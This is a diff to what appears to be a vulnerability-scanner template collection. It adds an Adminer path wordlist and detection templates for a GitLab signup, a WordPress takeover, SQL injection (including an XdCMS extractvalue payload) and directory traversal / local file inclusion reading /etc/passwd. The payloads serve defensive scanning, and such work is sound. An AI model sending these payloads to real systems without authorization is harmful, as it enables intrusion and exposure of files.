+/editor-4.2.5-mysql-cs.php
+/editor-4.2.5-mysql-de.php
+/editor-4.2.5-mysql-en.php
+/editor-4.2.5-mysql-pl.php
+/editor-4.2.5-mysql-sk.php
+/editor-4.2.5-mysql.php
+/editor-4.2.5-pl.php
+/editor-4.2.5-sk.php
+/editor-4.2.5.php
+/editor-4.3.0-cs.php
+/editor-4.3.0-de.php
+/editor-4.3.0-en.php
+/editor-4.3.0-mysql-cs.php
+/editor-4.3.0-mysql-de.php
+/editor-4.3.0-mysql-en.php
+/editor-4.3.0-mysql-pl.php
+/editor-4.3.0-mysql-sk.php
+/editor-4.3.0-mysql.php
+/editor-4.3.0-pl.php
+/editor-4.3.0-sk.php
+/editor-4.3.0.php
+/editor-4.3.1-cs.php
+/editor-4.3.1-de.php
+/editor-4.3.1-en.php
+/editor-4.3.1-mysql-cs.php
+/editor-4.3.1-mysql-de.php
+/editor-4.3.1-mysql-en.php
+/editor-4.3.1-mysql-pl.php
+/editor-4.3.1-mysql-sk.php
+/editor-4.3.1-mysql.php
+/editor-4.3.1-pl.php
+/editor-4.3.1-sk.php
+/editor-4.3.1.php
+/editor-4.4.0-cs.php
+/editor-4.4.0-de.php
+/editor-4.4.0-en.php
+/editor-4.4.0-mysql-cs.php
+/editor-4.4.0-mysql-de.php
+/editor-4.4.0-mysql-en.php
+/editor-4.4.0-mysql-pl.php
+/editor-4.4.0-mysql-sk.php
+/editor-4.4.0-mysql.php
+/editor-4.4.0-pl.php
+/editor-4.4.0-sk.php
+/editor-4.4.0.php
+/editor-4.5.0-cs.php
+/editor-4.5.0-de.php
+/editor-4.5.0-en.php
+/editor-4.5.0-mysql-cs.php
+/editor-4.5.0-mysql-de.php
+/editor-4.5.0-mysql-en.php
+/editor-4.5.0-mysql-pl.php
+/editor-4.5.0-mysql-sk.php
+/editor-4.5.0-mysql.php
+/editor-4.5.0-pl.php
+/editor-4.5.0-sk.php
+/editor-4.5.0.php
+/editor-4.6.0-cs.php
+/editor-4.6.0-de.php
+/editor-4.6.0-en.php
+/editor-4.6.0-mysql-cs.php
+/editor-4.6.0-mysql-de.php
+/editor-4.6.0-mysql-en.php
+/editor-4.6.0-mysql-pl.php
+/editor-4.6.0-mysql-sk.php
+/editor-4.6.0-mysql.php
+/editor-4.6.0-pl.php
+/editor-4.6.0-sk.php
+/editor-4.6.0.php
+/editor-4.6.1-cs.php
+/editor-4.6.1-de.php
+/editor-4.6.1-en.php
+/editor-4.6.1-mysql-cs.php
+/editor-4.6.1-mysql-de.php
+/editor-4.6.1-mysql-en.php
+/editor-4.6.1-mysql-pl.php
+/editor-4.6.1-mysql-sk.php
+/editor-4.6.1-mysql.php
+/editor-4.6.1-pl.php
+/editor-4.6.1-sk.php
+/editor-4.6.1.php
+/editor-4.6.2-cs.php
+/editor-4.6.2-de.php
+/editor-4.6.2-en.php
+/editor-4.6.2-mysql-cs.php
+/editor-4.6.2-mysql-de.php
+/editor-4.6.2-mysql-en.php
+/editor-4.6.2-mysql-pl.php
+/editor-4.6.2-mysql-sk.php
+/editor-4.6.2-mysql.php
+/editor-4.6.2-pl.php
+/editor-4.6.2-sk.php
+/editor-4.6.2.php
+/editor-4.6.3-cs.php
+/editor-4.6.3-de.php
+/editor-4.6.3-en.php
+/editor-4.6.3-mysql-cs.php
+/editor-4.6.3-mysql-de.php
+/editor-4.6.3-mysql-en.php
+/editor-4.6.3-mysql-pl.php
+/editor-4.6.3-mysql-sk.php
+/editor-4.6.3-mysql.php
+/editor-4.6.3-pl.php
+/editor-4.6.3-sk.php
+/editor-4.6.3.php
+/editor-4.7.0-cs.php
+/editor-4.7.0-de.php
+/editor-4.7.0-en.php
+/editor-4.7.0-mysql-cs.php
+/editor-4.7.0-mysql-de.php
+/editor-4.7.0-mysql-en.php
+/editor-4.7.0-mysql-pl.php
+/editor-4.7.0-mysql-sk.php
+/editor-4.7.0-mysql.php
+/editor-4.7.0-pl.php
+/editor-4.7.0-sk.php
+/editor-4.7.0.php
+/editor-4.7.1-cs.php
+/editor-4.7.1-de.php
+/editor-4.7.1-en.php
+/editor-4.7.1-mysql-cs.php
+/editor-4.7.1-mysql-de.php
+/editor-4.7.1-mysql-en.php
+/editor-4.7.1-mysql-pl.php
+/editor-4.7.1-mysql-sk.php
+/editor-4.7.1-mysql.php
+/editor-4.7.1-pl.php
+/editor-4.7.1-sk.php
+/editor-4.7.1.php
+/editor-4.7.2-cs.php
+/editor-4.7.2-de.php
+/editor-4.7.2-en.php
+/editor-4.7.2-mysql-cs.php
+/editor-4.7.2-mysql-de.php
+/editor-4.7.2-mysql-en.php
+/editor-4.7.2-mysql-pl.php
+/editor-4.7.2-mysql-sk.php
+/editor-4.7.2-mysql.php
+/editor-4.7.2-pl.php
+/editor-4.7.2-sk.php
+/editor-4.7.2.php
+/editor-4.7.3-cs.php
+/editor-4.7.3-de.php
+/editor-4.7.3-en.php
+/editor-4.7.3-mysql-cs.php
+/editor-4.7.3-mysql-de.php
+/editor-4.7.3-mysql-en.php
+/editor-4.7.3-mysql-pl.php
+/editor-4.7.3-mysql-sk.php
+/editor-4.7.3-mysql.php
+/editor-4.7.3-pl.php
+/editor-4.7.3-sk.php
+/editor-4.7.3.php
+/editor-4.7.4-cs.php
+/editor-4.7.4-de.php
+/editor-4.7.4-en.php
+/editor-4.7.4-mysql-cs.php
+/editor-4.7.4-mysql-de.php
+/editor-4.7.4-mysql-en.php
+/editor-4.7.4-mysql-pl.php
+/editor-4.7.4-mysql-sk.php
+/editor-4.7.4-mysql.php
+/editor-4.7.4-pl.php
+/editor-4.7.4-sk.php
+/editor-4.7.4.php
+/editor-4.7.5-cs.php
+/editor-4.7.5-de.php
+/editor-4.7.5-en.php
+/editor-4.7.5-mysql-cs.php
+/editor-4.7.5-mysql-de.php
+/editor-4.7.5-mysql-en.php
+/editor-4.7.5-mysql-pl.php
+/editor-4.7.5-mysql-sk.php
+/editor-4.7.5-mysql.php
+/editor-4.7.5-pl.php
+/editor-4.7.5-sk.php
+/editor-4.7.5.php
+/editor-4.7.6-cs.php
+/editor-4.7.6-de.php
+/editor-4.7.6-en.php
+/editor-4.7.6-mysql-cs.php
+/editor-4.7.6-mysql-de.php
+/editor-4.7.6-mysql-en.php
+/editor-4.7.6-mysql-pl.php
+/editor-4.7.6-mysql-sk.php
+/editor-4.7.6-mysql.php
+/editor-4.7.6-pl.php
+/editor-4.7.6-sk.php
+/editor-4.7.6.php
+/editor-4.7.7-cs.php
+/editor-4.7.7-de.php
+/editor-4.7.7-en.php
+/editor-4.7.7-mysql-cs.php
+/editor-4.7.7-mysql-de.php
+/editor-4.7.7-mysql-en.php
+/editor-4.7.7-mysql-pl.php
+/editor-4.7.7-mysql-sk.php
+/editor-4.7.7-mysql.php
+/editor-4.7.7-pl.php
+/editor-4.7.7-sk.php
+/editor-4.7.7.php
+/editor-4.7.8-cs.php
+/editor-4.7.8-de.php
+/editor-4.7.8-en.php
+/editor-4.7.8-mysql-cs.php
+/editor-4.7.8-mysql-de.php
+/editor-4.7.8-mysql-en.php
+/editor-4.7.8-mysql-pl.php
+/editor-4.7.8-mysql-sk.php
+/editor-4.7.8-mysql.php
+/editor-4.7.8-pl.php
+/editor-4.7.8-sk.php
+/editor-4.7.8.php
+/editor-4.7.9-cs.php
+/editor-4.7.9-de.php
+/editor-4.7.9-en.php
+/editor-4.7.9-mysql-cs.php
+/editor-4.7.9-mysql-de.php
+/editor-4.7.9-mysql-en.php
+/editor-4.7.9-mysql-pl.php
+/editor-4.7.9-mysql-sk.php
+/editor-4.7.9-mysql.php
+/editor-4.7.9-pl.php
+/editor-4.7.9-sk.php
+/editor-4.7.9.php
+/editor-4.8.0-cs.php
+/editor-4.8.0-de.php
+/editor-4.8.0-en.php
+/editor-4.8.0-mysql-cs.php
+/editor-4.8.0-mysql-de.php
+/editor-4.8.0-mysql-en.php
+/editor-4.8.0-mysql-pl.php
+/editor-4.8.0-mysql-sk.php
+/editor-4.8.0-mysql.php
+/editor-4.8.0-pl.php
+/editor-4.8.0-sk.php
+/editor-4.8.0.php
+/editor-mysql.php
+/editor.php
+/editor/
+/mysql.php
+/php/adminer.php
+/phpmyadmin.php
+/public/adminer.php
+/sql.php
+/tools/adminer.php
+/web/adminer.php
+/wp-content/plugins/adminer/adminer.php
--- a/helpers/wordlists/wp-plugins.txt
+++ b/helpers/wordlists/wp-plugins.txt
--- a/misconfiguration/gitlab/gitlab-public-signup.yaml
+++ b/misconfiguration/gitlab/gitlab-public-signup.yaml
@ -0,0 +1,31 @@
+id: gitlab-public-signup
+info:
+  name: GitLab public signup
+  author: pdteam
+  severity: info
+  tags: gitlab
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/users/sign_in"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<a data-qa-selector="register_link" href="/users/sign_up">Register now</a>'
+          - 'data-qa-selector="new_user_register_button"'
+
+      - type: word
+        words:
+          - 'https://about.gitlab.com'
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - '<meta content="GitLab.com" property="og:description">'
+        negative: true
--- a/takeovers/wordpress-takeover.yaml
+++ b/takeovers/wordpress-takeover.yaml
@ -1,10 +1,10 @@
 id: wordpress-takeover

 info:
-  name: wordpress takeover detection
-  author: pdcommunity
+  name: WordPress takeover detection
+  author: pdcommunity & geeknik
  severity: high
-  tags: takeover
+  tags: takeover,wordpress
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

 requests:
@ -12,7 +12,13 @@ requests:
    path:
      - "{{BaseURL}}"

+    redirects: true
+    matchers-condition: and
    matchers:
      - type: word
        words:
-          - Do you want to register
+          - 'Do you want to register'
+
+      - type: regex
+        regex:
+          - "[a-zA-Z0-9][a-zA-Z0-9-_]*\\.)*[a-zA-Z0-9]*[a-zA-Z0-9-_]*[[a-zA-Z0-9].wordpress.com"
--- a/vulnerabilities/generic/error-based-sql-injection.yaml
+++ b/vulnerabilities/generic/error-based-sql-injection.yaml
@ -8,12 +8,13 @@ info:
  tags: sqli

 requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/') OR 1 = 1 -- ];"
-
-    # Nuclei's use of net/http here will automatically encode the payload, thus sending {{BaseURL}}/%27%29%20OR%201%20=%201%20--%20%5D; as the request
-    # In order to send an unencoded payload, you'll have to make use of the rawhttp library by crafting a raw HTTP request
+  - raw:
+      - |
+        GET /') OR 1 = 1 -- ];
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+        Accept: */*
+        Connection: close

    matchers-condition: and
    matchers:
--- a/vulnerabilities/other/tpshop-directory-traversal.yaml
+++ b/vulnerabilities/other/tpshop-directory-traversal.yaml
@ -0,0 +1,24 @@
+id: tpshop-directory-traversal
+
+info:
+  name: Tpshop Directory Traversal
+  author: pikpikcu
+  severity: high
+  reference: https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA
+  tags: tpshop,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php/Home/uploadify/fileList?type=.+&path=../../../"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - '"state":"SUCCESS"'
+
+      - type: status
+        status:
+          - 200
--- a/vulnerabilities/other/xdcms-sqli.yaml
+++ b/vulnerabilities/other/xdcms-sqli.yaml
@ -0,0 +1,36 @@
+id: xdcms-sqli
+
+info:
+  name: XdCMS SQL Injection
+  author: pikpikcu
+  severity: high
+  reference: https://www.uedbox.com/post/35188/
+  tags: sqli,xdcms
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/index.php?m=member&f=login_save"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: |
+      username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Content-Type: text/html"
+        part: header
+
+      - type: word
+        words:
+          - "707564257851522176"
+          - "XPATH syntax error:"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml
+++ b/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml
@ -10,7 +10,6 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/?a=display&templateFile=README.md"
      - "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../windows/win.ini"

@ -21,8 +20,6 @@ requests:
        regex:
          - "root:[x*]:0:0:"
          - "bit app support"
-          - 'ThinkCMF'
-        part: body

      - type: status
        status:
--- a/workflows/wordpress-workflow.yaml
+++ b/workflows/wordpress-workflow.yaml
@ -11,6 +11,7 @@ workflows:
    matchers:
      - name: wordpress
        subtemplates:
+          - template: cves/2017/CVE-2017-1000170.yaml
          - template: cves/2018/CVE-2018-3810.yaml
          - template: cves/2019/CVE-2019-6112.yaml
          - template: cves/2019/CVE-2019-6715.yaml
@ -51,4 +52,4 @@ workflows:
          - template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml
          - template: vulnerabilities/wordpress/wp-uploads-listing.yaml
          - template: vulnerabilities/wordpress/wp-license-file.yaml
-          - template: vulnerabilities/wordpress-infinitewp-auth-bypass
+          - template: vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml